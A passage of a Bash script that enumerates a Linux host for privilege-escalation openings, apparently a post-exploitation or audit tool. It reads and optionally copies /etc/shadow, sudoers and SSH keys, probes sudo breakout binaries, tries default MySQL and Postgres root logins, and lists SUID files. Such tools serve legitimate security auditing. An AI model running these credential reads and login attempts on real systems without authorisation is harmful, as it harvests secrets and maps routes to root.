2>/dev/null` 164 | if [ "$hashesinpasswd" ]; then 165 | echo -e "\e[00;33mIt looks like we have password hashes in /etc/passwd!\e[00m\n$hashesinpasswd" |tee -a $report 2>/dev/null 166 | echo -e "\n" |tee -a $report 2>/dev/null 167 | else 168 | : 169 | fi 170 | 171 | #locate custom user accounts with some 'known default' uids 172 | readpasswd=`grep -v "^#" /etc/passwd | awk -F: '$3 == 0 || $3 == 500 || $3 == 501 || $3 == 502 || $3 == 1000 || $3 == 1001 || $3 == 1002 || $3 == 2000 || $3 == 2001 || $3 == 2002 { print }'` 173 | if [ "$readpasswd" ]; then 174 | echo -e "\e[00;31mSample entires from /etc/passwd (searching for uid values 0, 500, 501, 502, 1000, 1001, 1002, 2000, 2001, 2002):\e[00m\n$readpasswd" |tee -a $report 2>/dev/null 175 | echo -e "\n" 
|tee -a $report 2>/dev/null 176 | else 177 | : 178 | fi 179 | 180 | if [ "$export" ] && [ "$readpasswd" ]; then 181 | mkdir $format/etc-export/ 2>/dev/null 182 | cp /etc/passwd $format/etc-export/passwd 2>/dev/null 183 | else 184 | : 185 | fi 186 | 187 | #checks to see if the shadow file can be read 188 | readshadow=`cat /etc/shadow 2>/dev/null` 189 | if [ "$readshadow" ]; then 190 | echo -e "\e[00;33m***We can read the shadow file!\e[00m\n$readshadow" |tee -a $report 2>/dev/null 191 | echo -e "\n" |tee -a $report 2>/dev/null 192 | else 193 | : 194 | fi 195 | 196 | if [ "$export" ] && [ "$readshadow" ]; then 197 | mkdir $format/etc-export/ 2>/dev/null 198 | cp /etc/shadow $format/etc-export/shadow 2>/dev/null 199 | else 200 | : 201 | fi 202 | 203 | #checks to see if /etc/master.passwd can be read - BSD 'shadow' variant 204 | readmasterpasswd=`cat /etc/master.passwd 2>/dev/null` 205 | if [ "$readmasterpasswd" ]; then 206 | echo -e "\e[00;33m***We can read the master.passwd file!\e[00m\n$readmasterpasswd" |tee -a $report 2>/dev/null 207 | echo -e "\n" |tee -a $report 2>/dev/null 208 | else 209 | : 210 | fi 211 | 212 | if [ "$export" ] && [ "$readmasterpasswd" ]; then 213 | mkdir $format/etc-export/ 2>/dev/null 214 | cp /etc/master.passwd $format/etc-export/master.passwd 2>/dev/null 215 | else 216 | : 217 | fi 218 | 219 | #all root accounts (uid 0) 220 | echo -e "\e[00;31mSuper user account(s):\e[00m" | tee -a $report 2>/dev/null; grep -v -E "^#" /etc/passwd 2>/dev/null| awk -F: '$3 == 0 { print $1}' 2>/dev/null |tee -a $report 2>/dev/null 221 | echo -e "\n" |tee -a $report 2>/dev/null 222 | 223 | #pull out vital sudoers info 224 | sudoers=`cat /etc/sudoers 2>/dev/null | grep -v -e '^$' 2>/dev/null |grep -v "#" 2>/dev/null` 225 | if [ "$sudoers" ]; then 226 | echo -e "\e[00;31mSudoers configuration (condensed):\e[00m$sudoers" | tee -a $report 2>/dev/null 227 | echo -e "\n" |tee -a $report 2>/dev/null 228 | else 229 | : 230 | fi 231 | 232 | if [ "$export" ] && [ 
"$sudoers" ]; then 233 | mkdir $format/etc-export/ 2>/dev/null 234 | cp /etc/sudoers $format/etc-export/sudoers 2>/dev/null 235 | else 236 | : 237 | fi 238 | 239 | #can we sudo without supplying a password 240 | sudoperms=`echo '' | sudo -S -l 2>/dev/null` 241 | if [ "$sudoperms" ]; then 242 | echo -e "\e[00;33mWe can sudo without supplying a password!\e[00m\n$sudoperms" |tee -a $report 2>/dev/null 243 | echo -e "\n" |tee -a $report 2>/dev/null 244 | else 245 | : 246 | fi 247 | 248 | #known 'good' breakout binaries 249 | sudopwnage=`echo '' | sudo -S -l 2>/dev/null | grep -w 'nmap\|perl\|'awk'\|'find'\|'bash'\|'sh'\|'man'\|'more'\|'less'\|'vi'\|'emacs'\|'vim'\|'nc'\|'netcat'\|python\|ruby\|lua\|irb' | xargs -r ls -la 2>/dev/null` 250 | if [ "$sudopwnage" ]; then 251 | echo -e "\e[00;33m***Possible Sudo PWNAGE!\e[00m\n$sudopwnage" |tee -a $report 2>/dev/null 252 | echo -e "\n" |tee -a $report 2>/dev/null 253 | else 254 | : 255 | fi 256 | 257 | #checks to see if roots home directory is accessible 258 | rthmdir=`ls -ahl /root/ 2>/dev/null` 259 | if [ "$rthmdir" ]; then 260 | echo -e "\e[00;33m***We can read root's home directory!\e[00m\n$rthmdir" |tee -a $report 2>/dev/null 261 | echo -e "\n" |tee -a $report 2>/dev/null 262 | else 263 | : 264 | fi 265 | 266 | #displays /home directory permissions - check if any are lax 267 | homedirperms=`ls -ahl /home/ 2>/dev/null` 268 | if [ "$homedirperms" ]; then 269 | echo -e "\e[00;31mAre permissions on /home directories lax:\e[00m\n$homedirperms" |tee -a $report 2>/dev/null 270 | echo -e "\n" |tee -a $report 2>/dev/null 271 | else 272 | : 273 | fi 274 | 275 | #looks for files we can write to that don't belong to us 276 | if [ "$thorough" = "1" ]; then 277 | grfilesall=`find / -writable -not -user \`whoami\` -type f -not -path "/proc/*" -exec ls -al {} \; 2>/dev/null` 278 | if [ "$grfilesall" ]; then 279 | echo -e "\e[00;31mFiles not owned by user but writable by group:\e[00m\n$grfilesall" |tee -a $report 2>/dev/null 280 | echo 
-e "\n" |tee -a $report 2>/dev/null 281 | else 282 | : 283 | fi 284 | fi 285 | 286 | #looks for world-reabable files within /home - depending on number of /home dirs & files, this can take some time so is only 'activated' with thorough scanning switch 287 | if [ "$thorough" = "1" ]; then 288 | wrfileshm=`find /home/ -perm -4 -type f -exec ls -al {} \; 2>/dev/null` 289 | if [ "$wrfileshm" ]; then 290 | echo -e "\e[00;31mWorld-readable files within /home:\e[00m\n$wrfileshm" |tee -a $report 2>/dev/null 291 | echo -e "\n" |tee -a $report 2>/dev/null 292 | else 293 | : 294 | fi 295 | else 296 | : 297 | fi 298 | 299 | if [ "$thorough" = "1" ]; then 300 | if [ "$export" ] && [ "$wrfileshm" ]; then 301 | mkdir $format/wr-files/ 2>/dev/null 302 | for i in $wrfileshm; do cp --parents $i $format/wr-files/ ; done 2>/dev/null 303 | else 304 | : 305 | fi 306 | else 307 | : 308 | fi 309 | 310 | #lists current user's home directory contents 311 | if [ "$thorough" = "1" ]; then 312 | homedircontents=`ls -ahl ~ 2>/dev/null` 313 | if [ "$homedircontents" ] ; then 314 | echo -e "\e[00;31mHome directory contents:\e[00m\n$homedircontents" |tee -a $report 2>/dev/null 315 | echo -e "\n" |tee -a $report 2>/dev/null 316 | else 317 | : 318 | fi 319 | else 320 | : 321 | fi 322 | 323 | #checks for if various ssh files are accessible - this can take some time so is only 'activated' with thorough scanning switch 324 | if [ "$thorough" = "1" ]; then 325 | sshfiles=`find / \( -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" \) -exec ls -la {} 2>/dev/null \;` 326 | if [ "$sshfiles" ]; then 327 | echo -e "\e[00;31mSSH keys/host information found in the following locations:\e[00m\n$sshfiles" |tee -a $report 2>/dev/null 328 | echo -e "\n" |tee -a $report 2>/dev/null 329 | else 330 | : 331 | fi 332 | else 333 | : 334 | fi 335 | 336 | if [ "$thorough" = "1" ]; then 337 | if [ "$export" ] && [ "$sshfiles" ]; then 338 | mkdir 
$format/ssh-files/ 2>/dev/null 339 | for i in $sshfiles; do cp --parents $i $format/ssh-files/; done 2>/dev/null 340 | else 341 | : 342 | fi 343 | else 344 | : 345 | fi 346 | 347 | #is root permitted to login via ssh 348 | sshrootlogin=`grep "PermitRootLogin " /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | awk '{print $2}'` 349 | if [ "$sshrootlogin" = "yes" ]; then 350 | echo -e "\e[00;31mRoot is allowed to login via SSH:\e[00m" |tee -a $report 2>/dev/null; grep "PermitRootLogin " /etc/ssh/sshd_config 2>/dev/null | grep -v "#" |tee -a $report 2>/dev/null 351 | echo -e "\n" |tee -a $report 2>/dev/null 352 | else 353 | : 354 | fi 355 | 356 | echo -e "\e[00;33m### ENVIRONMENTAL #######################################\e[00m" |tee -a $report 2>/dev/null 357 | 358 | #env information 359 | envinfo=`env 2>/dev/null | grep -v 'LS_COLORS' 2>/dev/null` 360 | if [ "$envinfo" ]; then 361 | echo -e "\e[00;31m Environment information:\e[00m\n$envinfo" |tee -a $report 2>/dev/null 362 | echo -e "\n" |tee -a $report 2>/dev/null 363 | else 364 | : 365 | fi 366 | 367 | #current path configuration 368 | pathinfo=`echo $PATH 2>/dev/null` 369 | if [ "$pathinfo" ]; then 370 | echo -e "\e[00;31mPath information:\e[00m\n$pathinfo" |tee -a $report 2>/dev/null 371 | echo -e "\n" |tee -a $report 2>/dev/null 372 | else 373 | : 374 | fi 375 | 376 | #lists available shells 377 | shellinfo=`cat /etc/shells 2>/dev/null` 378 | if [ "$shellinfo" ]; then 379 | echo -e "\e[00;31mAvailable shells:\e[00m\n$shellinfo" |tee -a $report 2>/dev/null 380 | echo -e "\n" |tee -a $report 2>/dev/null 381 | else 382 | : 383 | fi 384 | 385 | #current umask value with both octal and symbolic output 386 | umask=`umask -S 2>/dev/null & umask 2>/dev/null` 387 | if [ "$umask" ]; then 388 | echo -e "\e[00;31mCurrent umask value:\e[00m\n$umask" |tee -a $report 2>/dev/null 389 | echo -e "\n" |tee -a $report 2>/dev/null 390 | else 391 | : 392 | fi 393 | 394 | #umask value as in /etc/login.defs 395 | umaskdef=`cat 
/etc/login.defs 2>/dev/null |grep -i UMASK 2>/dev/null |grep -v "#" 2>/dev/null` 396 | if [ "$umaskdef" ]; then 397 | echo -e "\e[00;31mumask value as specified in /etc/login.defs:\e[00m\n$umaskdef" |tee -a $report 2>/dev/null 398 | echo -e "\n" |tee -a $report 2>/dev/null 399 | else 400 | : 401 | fi 402 | 403 | #password policy information as stored in /etc/login.defs 404 | logindefs=`cat /etc/login.defs 2>/dev/null | grep "PASS_MAX_DAYS\|PASS_MIN_DAYS\|PASS_WARN_AGE\|ENCRYPT_METHOD" 2>/dev/null | grep -v "#" 2>/dev/null` 405 | if [ "$logindefs" ]; then 406 | echo -e "\e[00;31mPassword and storage information:\e[00m\n$logindefs" |tee -a $report 2>/dev/null 407 | echo -e "\n" |tee -a $report 2>/dev/null 408 | else 409 | : 410 | fi 411 | 412 | if [ "$export" ] && [ "$logindefs" ]; then 413 | mkdir $format/etc-export/ 2>/dev/null 414 | cp /etc/login.defs $format/etc-export/login.defs 2>/dev/null 415 | else 416 | : 417 | fi 418 | 419 | echo -e "\e[00;33m### JOBS/TASKS ##########################################\e[00m" |tee -a $report 2>/dev/null 420 | 421 | #are there any cron jobs configured 422 | cronjobs=`ls -la /etc/cron* 2>/dev/null` 423 | if [ "$cronjobs" ]; then 424 | echo -e "\e[00;31mCron jobs:\e[00m\n$cronjobs" |tee -a $report 2>/dev/null 425 | echo -e "\n" |tee -a $report 2>/dev/null 426 | else 427 | : 428 | fi 429 | 430 | #can we manipulate these jobs in any way 431 | cronjobwwperms=`find /etc/cron* -perm -0002 -type f -exec ls -la {} \; -exec cat {} 2>/dev/null \;` 432 | if [ "$cronjobwwperms" ]; then 433 | echo -e "\e[00;33m***World-writable cron jobs and file contents:\e[00m\n$cronjobwwperms" |tee -a $report 2>/dev/null 434 | echo -e "\n" |tee -a $report 2>/dev/null 435 | else 436 | : 437 | fi 438 | 439 | #contab contents 440 | crontab=`cat /etc/crontab 2>/dev/null` 441 | if [ "$crontab" ]; then 442 | echo -e "\e[00;31mCrontab contents:\e[00m\n$crontab" |tee -a $report 2>/dev/null 443 | echo -e "\n" |tee -a $report 2>/dev/null 444 | else 445 | : 446 | fi 
447 | 448 | crontabvar=`ls -la /var/spool/cron/crontabs 2>/dev/null` 449 | if [ "$crontabvar" ]; then 450 | echo -e "\e[00;31mAnything interesting in /var/spool/cron/crontabs:\e[00m\n$crontabvar" |tee -a $report 2>/dev/null 451 | echo -e "\n" |tee -a $report 2>/dev/null 452 | else 453 | : 454 | fi 455 | 456 | anacronjobs=`ls -la /etc/anacrontab 2>/dev/null; cat /etc/anacrontab 2>/dev/null` 457 | if [ "$anacronjobs" ]; then 458 | echo -e "\e[00;31mAnacron jobs and associated file permissions:\e[00m\n$anacronjobs" |tee -a $report 2>/dev/null 459 | echo -e "\n" |tee -a $report 2>/dev/null 460 | else 461 | : 462 | fi 463 | 464 | anacrontab=`ls -la /var/spool/anacron 2>/dev/null` 465 | if [ "$anacrontab" ]; then 466 | echo -e "\e[00;31mWhen were jobs last executed (/var/spool/anacron contents):\e[00m\n$anacrontab" |tee -a $report 2>/dev/null 467 | echo -e "\n" |tee -a $report 2>/dev/null 468 | else 469 | : 470 | fi 471 | 472 | #pull out account names from /etc/passwd and see if any users have associated cronjobs (priv command) 473 | cronother=`cat /etc/passwd | cut -d ":" -f 1 | xargs -n1 crontab -l -u 2>/dev/null` 474 | if [ "$cronother" ]; then 475 | echo -e "\e[00;31mJobs held by all users:\e[00m\n$cronother" |tee -a $report 2>/dev/null 476 | echo -e "\n" |tee -a $report 2>/dev/null 477 | else 478 | : 479 | fi 480 | 481 | echo -e "\e[00;33m### NETWORKING ##########################################\e[00m" |tee -a $report 2>/dev/null 482 | 483 | #nic information 484 | nicinfo=`/sbin/ifconfig -a 2>/dev/null` 485 | if [ "$nicinfo" ]; then 486 | echo -e "\e[00;31mNetwork & IP info:\e[00m\n$nicinfo" |tee -a $report 2>/dev/null 487 | echo -e "\n" |tee -a $report 2>/dev/null 488 | else 489 | : 490 | fi 491 | 492 | arpinfo=`arp -a 2>/dev/null` 493 | if [ "$arpinfo" ]; then 494 | echo -e "\e[00;31mARP history:\e[00m\n$arpinfo" |tee -a $report 2>/dev/null 495 | echo -e "\n" |tee -a $report 2>/dev/null 496 | else 497 | : 498 | fi 499 | 500 | #dns settings 501 | nsinfo=`cat 
/etc/resolv.conf 2>/dev/null | grep "nameserver"` 502 | if [ "$nsinfo" ]; then 503 | echo -e "\e[00;31mNameserver(s):\e[00m\n$nsinfo" |tee -a $report 2>/dev/null 504 | echo -e "\n" |tee -a $report 2>/dev/null 505 | else 506 | : 507 | fi 508 | 509 | #default route configuration 510 | defroute=`route 2>/dev/null | grep default` 511 | if [ "$defroute" ]; then 512 | echo -e "\e[00;31mDefault route:\e[00m\n$defroute" |tee -a $report 2>/dev/null 513 | echo -e "\n" |tee -a $report 2>/dev/null 514 | else 515 | : 516 | fi 517 | 518 | #listening TCP 519 | tcpservs=`netstat -antp 2>/dev/null` 520 | if [ "$tcpservs" ]; then 521 | echo -e "\e[00;31mListening TCP:\e[00m\n$tcpservs" |tee -a $report 2>/dev/null 522 | echo -e "\n" |tee -a $report 2>/dev/null 523 | else 524 | : 525 | fi 526 | 527 | #listening UDP 528 | udpservs=`netstat -anup 2>/dev/null` 529 | if [ "$udpservs" ]; then 530 | echo -e "\e[00;31mListening UDP:\e[00m\n$udpservs" |tee -a $report 2>/dev/null 531 | echo -e "\n" |tee -a $report 2>/dev/null 532 | else 533 | : 534 | fi 535 | 536 | echo -e "\e[00;33m### SERVICES #############################################\e[00m" |tee -a $report 2>/dev/null 537 | 538 | #running processes 539 | psaux=`ps aux 2>/dev/null` 540 | if [ "$psaux" ]; then 541 | echo -e "\e[00;31mRunning processes:\e[00m\n$psaux" |tee -a $report 2>/dev/null 542 | echo -e "\n" |tee -a $report 2>/dev/null 543 | else 544 | : 545 | fi 546 | 547 | #lookup process binary path and permissisons 548 | procperm=`ps aux 2>/dev/null | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null` 549 | if [ "$procperm" ]; then 550 | echo -e "\e[00;31mProcess binaries & associated permissions (from above list):\e[00m\n$procperm" |tee -a $report 2>/dev/null 551 | echo -e "\n" |tee -a $report 2>/dev/null 552 | else 553 | : 554 | fi 555 | 556 | if [ "$export" ] && [ "$procperm" ]; then 557 | procpermbase=`ps aux 2>/dev/null | awk '{print $11}' | xargs -r ls 2>/dev/null | awk '!x[$0]++' 2>/dev/null` 558 | 
mkdir $format/ps-export/ 2>/dev/null 559 | for i in $procpermbase; do cp --parents $i $format/ps-export/; done 2>/dev/null 560 | else 561 | : 562 | fi 563 | 564 | #anything 'useful' in inetd.conf 565 | inetdread=`cat /etc/inetd.conf 2>/dev/null` 566 | if [ "$inetdread" ]; then 567 | echo -e "\e[00;31mContents of /etc/inetd.conf:\e[00m\n$inetdread" |tee -a $report 2>/dev/null 568 | echo -e "\n" |tee -a $report 2>/dev/null 569 | else 570 | : 571 | fi 572 | 573 | if [ "$export" ] && [ "$inetdread" ]; then 574 | mkdir $format/etc-export/ 2>/dev/null 575 | cp /etc/inetd.conf $format/etc-export/inetd.conf 2>/dev/null 576 | else 577 | : 578 | fi 579 | 580 | #very 'rough' command to extract associated binaries from inetd.conf & show permissions of each 581 | inetdbinperms=`cat /etc/inetd.conf 2>/dev/null | awk '{print $7}' |xargs -r ls -la 2>/dev/null` 582 | if [ "$inetdbinperms" ]; then 583 | echo -e "\e[00;31mThe related inetd binary permissions:\e[00m\n$inetdbinperms" |tee -a $report 2>/dev/null 584 | echo -e "\n" |tee -a $report 2>/dev/null 585 | else 586 | : 587 | fi 588 | 589 | xinetdread=`cat /etc/xinetd.conf 2>/dev/null` 590 | if [ "$xinetdread" ]; then 591 | echo -e "\e[00;31mContents of /etc/xinetd.conf:\e[00m\n$xinetdread" |tee -a $report 2>/dev/null 592 | echo -e "\n" |tee -a $report 2>/dev/null 593 | else 594 | : 595 | fi 596 | 597 | if [ "$export" ] && [ "$xinetdread" ]; then 598 | mkdir $format/etc-export/ 2>/dev/null 599 | cp /etc/xinetd.conf $format/etc-export/xinetd.conf 2>/dev/null 600 | else 601 | : 602 | fi 603 | 604 | xinetdincd=`cat /etc/xinetd.conf 2>/dev/null |grep "/etc/xinetd.d" 2>/dev/null` 605 | if [ "$xinetdincd" ]; then 606 | echo -e "\e[00;31m/etc/xinetd.d is included in /etc/xinetd.conf - associated binary permissions are listed below:\e[00m" |tee -a $report 2>/dev/null; ls -la /etc/xinetd.d 2>/dev/null |tee -a $report 2>/dev/null 607 | echo -e "\n" |tee -a $report 2>/dev/null 608 | else 609 | : 610 | fi 611 | 612 | #very 'rough' command to extract associated binaries 
from xinetd.conf & show permisisons of each 613 | xinetdbinperms=`cat /etc/xinetd.conf 2>/dev/null | awk '{print $7}' |xargs -r ls -la 2>/dev/null` 614 | if [ "$xinetdbinperms" ]; then 615 | echo -e "\e[00;31mThe related xinetd binary permissions:\e[00m\n$xinetdbinperms" |tee -a $report 2>/dev/null 616 | echo -e "\n" |tee -a $report 2>/dev/null 617 | else 618 | : 619 | fi 620 | 621 | initdread=`ls -la /etc/init.d 2>/dev/null` 622 | if [ "$initdread" ]; then 623 | echo -e "\e[00;31m/etc/init.d/ binary permissions:\e[00m\n$initdread" |tee -a $report 2>/dev/null 624 | echo -e "\n" |tee -a $report 2>/dev/null 625 | else 626 | : 627 | fi 628 | 629 | #init.d files NOT belonging to root! 630 | initdperms=`find /etc/init.d/ \! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null` 631 | if [ "$initdperms" ]; then 632 | echo -e "\e[00;31m/etc/init.d/ files not belonging to root (uid 0):\e[00m\n$initdperms" |tee -a $report 2>/dev/null 633 | echo -e "\n" |tee -a $report 2>/dev/null 634 | else 635 | : 636 | fi 637 | 638 | rcdread=`ls -la /etc/rc.d/init.d 2>/dev/null` 639 | if [ "$rcdread" ]; then 640 | echo -e "\e[00;31m/etc/rc.d/init.d binary permissions:\e[00m\n$rcdread" |tee -a $report 2>/dev/null 641 | echo -e "\n" |tee -a $report 2>/dev/null 642 | else 643 | : 644 | fi 645 | 646 | #init.d files NOT belonging to root! 647 | rcdperms=`find /etc/rc.d/init.d \! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null` 648 | if [ "$rcdperms" ]; then 649 | echo -e "\e[00;31m/etc/rc.d/init.d files not belonging to root (uid 0):\e[00m\n$rcdperms" |tee -a $report 2>/dev/null 650 | echo -e "\n" |tee -a $report 2>/dev/null 651 | else 652 | : 653 | fi 654 | 655 | usrrcdread=`ls -la /usr/local/etc/rc.d 2>/dev/null` 656 | if [ "$usrrcdread" ]; then 657 | echo -e "\e[00;31m/usr/local/etc/rc.d binary permissions:\e[00m\n$usrrcdread" |tee -a $report 2>/dev/null 658 | echo -e "\n" |tee -a $report 2>/dev/null 659 | else 660 | : 661 | fi 662 | 663 | #rc.d files NOT belonging to root! 
664 | usrrcdperms=`find /usr/local/etc/rc.d \! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null` 665 | if [ "$usrrcdperms" ]; then 666 | echo -e "\e[00;31m/usr/local/etc/rc.d files not belonging to root (uid 0):\e[00m\n$usrrcdperms" |tee -a $report 2>/dev/null 667 | echo -e "\n" |tee -a $report 2>/dev/null 668 | else 669 | : 670 | fi 671 | 672 | echo -e "\e[00;33m### SOFTWARE #############################################\e[00m" |tee -a $report 2>/dev/null 673 | 674 | #sudo version - check to see if there are any known vulnerabilities with this 675 | sudover=`sudo -V 2>/dev/null| grep "Sudo version" 2>/dev/null` 676 | if [ "$sudover" ]; then 677 | echo -e "\e[00;31mSudo version:\e[00m\n$sudover" |tee -a $report 2>/dev/null 678 | echo -e "\n" |tee -a $report 2>/dev/null 679 | else 680 | : 681 | fi 682 | 683 | #mysql details - if installed 684 | mysqlver=`mysql --version 2>/dev/null` 685 | if [ "$mysqlver" ]; then 686 | echo -e "\e[00;31mMYSQL version:\e[00m\n$mysqlver" |tee -a $report 2>/dev/null 687 | echo -e "\n" |tee -a $report 2>/dev/null 688 | else 689 | : 690 | fi 691 | 692 | #checks to see if root/root will get us a connection 693 | mysqlconnect=`mysqladmin -uroot -proot version 2>/dev/null` 694 | if [ "$mysqlconnect" ]; then 695 | echo -e "\e[00;33m***We can connect to the local MYSQL service with default root/root credentials!\e[00m\n$mysqlconnect" |tee -a $report 2>/dev/null 696 | echo -e "\n" |tee -a $report 2>/dev/null 697 | else 698 | : 699 | fi 700 | 701 | #mysql version details 702 | mysqlconnectnopass=`mysqladmin -uroot version 2>/dev/null` 703 | if [ "$mysqlconnectnopass" ]; then 704 | echo -e "\e[00;33m***We can connect to the local MYSQL service as 'root' and without a password!\e[00m\n$mysqlconnectnopass" |tee -a $report 2>/dev/null 705 | echo -e "\n" |tee -a $report 2>/dev/null 706 | else 707 | : 708 | fi 709 | 710 | #postgres details - if installed 711 | postgver=`psql -V 2>/dev/null` 712 | if [ "$postgver" ]; then 713 | echo -e 
"\e[00;31mPostgres version:\e[00m\n$postgver" |tee -a $report 2>/dev/null 714 | echo -e "\n" |tee -a $report 2>/dev/null 715 | else 716 | : 717 | fi 718 | 719 | #checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this 720 | postcon1=`psql -U postgres template0 -c 'select version()' 2>/dev/null | grep version` 721 | if [ "$postcon1" ]; then 722 | echo -e "\e[00;33m***We can connect to Postgres DB 'template0' as user 'postgres' with no password!:\e[00m\n$postcon1" |tee -a $report 2>/dev/null 723 | echo -e "\n" |tee -a $report 2>/dev/null 724 | else 725 | : 726 | fi 727 | 728 | postcon11=`psql -U postgres template1 -c 'select version()' 2>/dev/null | grep version` 729 | if [ "$postcon11" ]; then 730 | echo -e "\e[00;33m***We can connect to Postgres DB 'template1' as user 'postgres' with no password!:\e[00m\n$postcon11" |tee -a $report 2>/dev/null 731 | echo -e "\n" |tee -a $report 2>/dev/null 732 | else 733 | : 734 | fi 735 | 736 | postcon2=`psql -U pgsql template0 -c 'select version()' 2>/dev/null | grep version` 737 | if [ "$postcon2" ]; then 738 | echo -e "\e[00;33m***We can connect to Postgres DB 'template0' as user 'psql' with no password!:\e[00m\n$postcon2" |tee -a $report 2>/dev/null 739 | echo -e "\n" |tee -a $report 2>/dev/null 740 | else 741 | : 742 | fi 743 | 744 | postcon22=`psql -U pgsql template1 -c 'select version()' 2>/dev/null | grep version` 745 | if [ "$postcon22" ]; then 746 | echo -e "\e[00;33m***We can connect to Postgres DB 'template1' as user 'psql' with no password!:\e[00m\n$postcon22" |tee -a $report 2>/dev/null 747 | echo -e "\n" |tee -a $report 2>/dev/null 748 | else 749 | : 750 | fi 751 | 752 | #apache details - if installed 753 | apachever=`apache2 -v 2>/dev/null; httpd -v 2>/dev/null` 754 | if [ "$apachever" ]; then 755 | echo -e "\e[00;31mApache version:\e[00m\n$apachever" |tee -a $report 2>/dev/null 756 | echo -e "\n" |tee -a $report 2>/dev/null 757 | else 758 | : 759 | fi 

#what account is apache running under
apacheusr=`cat /etc/apache2/envvars 2>/dev/null |grep -i 'user\|group' 2>/dev/null |awk '{sub(/.*export /,"")}1' 2>/dev/null`
if [ "$apacheusr" ]; then
  echo -e "\e[00;31mApache user configuration:\e[00m\n$apacheusr" |tee -a $report 2>/dev/null
  echo -e "\n" |tee -a $report 2>/dev/null
else
  :
fi

if [ "$export" ] && [ "$apacheusr" ]; then
  mkdir --parents $format/etc-export/apache2/ 2>/dev/null
  cp /etc/apache2/envvars $format/etc-export/apache2/envvars 2>/dev/null
else
  :
fi

#installed apache modules
apachemodules=`apache2ctl -M 2>/dev/null; httpd -M 2>/dev/null`
if [ "$apachemodules" ]; then
  echo -e "\e[00;31mInstalled Apache modules:\e[00m\n$apachemodules" |tee -a $report 2>/dev/null
  echo -e "\n" |tee -a $report 2>/dev/null
else
  :
fi

#anything in the default http home dirs
apachehomedirs=`ls -alhR /var/www/ 2>/dev/null; ls -alhR /srv/www/htdocs/ 2>/dev/null; ls -alhR /usr/local/www/apache2/data/ 2>/dev/null; ls -alhR /opt/lampp/htdocs/ 2>/dev/null`
if [ "$apachehomedirs" ]; then
  echo -e "\e[00;31mAnything in the Apache home dirs?:\e[00m\n$apachehomedirs" |tee -a $report 2>/dev/null
  echo -e "\n" |tee -a $report 2>/dev/null
else
  :
fi

echo -e "\e[00;33m### INTERESTING FILES ####################################\e[00m" |tee -a $report 2>/dev/null

#checks to see if various files are installed
echo -e "\e[00;31mUseful file locations:\e[00m" |tee -a $report 2>/dev/null; which nc 2>/dev/null |tee -a $report 2>/dev/null; which netcat 2>/dev/null |tee -a $report 2>/dev/null; which wget 2>/dev/null |tee -a $report 2>/dev/null; which nmap 2>/dev/null |tee -a $report 2>/dev/null; which gcc 2>/dev/null |tee -a $report 2>/dev/null
echo -e "\n" |tee -a $report 2>/dev/null

#limited search for installed compilers (dpkg and yum are both tried; a failing dpkg lookup must not skip the yum one)
compiler=`dpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null; yum list installed 'gcc*' 2>/dev/null| grep gcc 2>/dev/null`
if [ "$compiler" ]; then
  echo -e "\e[00;31mInstalled compilers:\e[00m\n$compiler" |tee -a $report 2>/dev/null
  echo -e "\n" |tee -a $report 2>/dev/null
else
  :
fi

#manual check - lists out sensitive files, can we read/modify etc.
echo -e "\e[00;31mCan we read/write sensitive files:\e[00m" |tee -a $report 2>/dev/null; ls -la /etc/passwd 2>/dev/null |tee -a $report 2>/dev/null; ls -la /etc/group 2>/dev/null |tee -a $report 2>/dev/null; ls -la /etc/profile 2>/dev/null |tee -a $report 2>/dev/null; ls -la /etc/shadow 2>/dev/null |tee -a $report 2>/dev/null; ls -la /etc/master.passwd 2>/dev/null |tee -a $report 2>/dev/null
echo -e "\n" |tee -a $report 2>/dev/null

#search for suid files - this can take some time so is only 'activated' with thorough scanning switch (as are all suid scans below)
if [ "$thorough" = "1" ]; then
  findsuid=`find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;`
  if [ "$findsuid" ]; then
    echo -e "\e[00;31mSUID files:\e[00m\n$findsuid" |tee -a $report 2>/dev/null
    echo -e "\n" |tee -a $report 2>/dev/null
  else
    :
  fi
else
  :
fi

if [ "$thorough" = "1" ]; then
  if [ "$export" ] && [ "$findsuid" ]; then
    mkdir $format/suid-files/ 2>/dev/null
    for i in $findsuid; do cp $i $format/suid-files/; done 2>/dev/null
  else
    :
  fi
else
  :
fi

#list of 'interesting' suid files - feel free to make additions
if [ "$thorough" = "1" ]; then
  intsuid=`find / -perm -4000 -type f 2>/dev/null | grep -w 'nmap\|perl\|awk\|find\|bash\|sh\|man\|more\|less\|vi\|vim\|emacs\|nc\|netcat\|python\|ruby\|lua\|irb\|pl' | xargs -r ls -la 2>/dev/null`
  if [ "$intsuid" ]; then
    echo -e "\e[00;33m***Possibly interesting SUID files:\e[00m\n$intsuid" |tee -a $report 2>/dev/null
    echo -e "\n" |tee -a $report 2>/dev/null
  else
    :
  fi
else
  :
fi

#lists world-writable suid files
if [ "$thorough" = "1" ]; then
  wwsuid=`find / -perm -4007 -type f -exec ls -la {} 2>/dev/null \;`
  if [ "$wwsuid" ]; then
    echo -e "\e[00;31mWorld-writable SUID files:\e[00m\n$wwsuid" |tee -a $report 2>/dev/null
    echo -e "\n" |tee -a $report 2>/dev/null
  else
    :
  fi
else
  :
fi

#lists world-writable suid files owned by root
if [ "$thorough" = "1" ]; then
  wwsuidrt=`find / -uid 0 -perm -4007 -type f -exec ls -la {} 2>/dev/null \;`
  if [ "$wwsuidrt" ]; then
    echo -e "\e[00;31mWorld-writable SUID files owned by root:\e[00m\n$wwsuidrt" |tee -a $report 2>/dev/null
    echo -e "\n" |tee -a $report 2>/dev/null
  else
    :
  fi
else
  :
fi

#search for guid files - this can take some time so is only 'activated' with thorough scanning switch (as are all guid scans below)
if [ "$thorough" = "1" ]; then
  findguid=`find / -perm -2000 -type f -exec ls -la {} 2>/dev/null \;`
  if [ "$findguid" ]; then
    echo -e "\e[00;31mGUID files:\e[00m\n$findguid" |tee -a $report 2>/dev/null
    echo -e "\n" |tee -a $report 2>/dev/null
  else
    :
  fi
else
  :
fi

if [ "$thorough" = "1" ]; then
  if [ "$export" ] && [ "$findguid" ]; then
